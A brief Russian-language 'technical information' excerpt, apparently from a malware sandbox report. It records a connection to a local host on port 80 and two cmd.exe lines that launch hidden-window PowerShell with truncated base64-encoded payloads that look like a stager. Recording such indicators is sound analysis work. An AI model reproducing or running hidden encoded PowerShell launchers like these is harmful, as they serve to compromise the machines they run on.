Техническая информация
- '<LOCALNET>.1.48':80
- '%WINDIR%\syswow64\cmd.exe' /C START /B powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAHIAUwBpAE8ATgBUAEEAQgBMAEUALgBQAFMAVgBFAFIAcwBJAE8AbgAuAE0AQQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABHAFAARgA9AFsAcgBFAEYAXQAuAEEAUwBTAE...' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /C START /B powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBFAHIAUwBpAE8ATgBUAEEAQgBMAEUALgBQAFMAVgBFAFIAcwBJAE8AbgAuAE0AQQBqAG8AUgAgAC0ARwBlACAAMwApAHsAJABHAFAARgA9AFsAcgBFAEYAXQAuAEEAUwBTAE...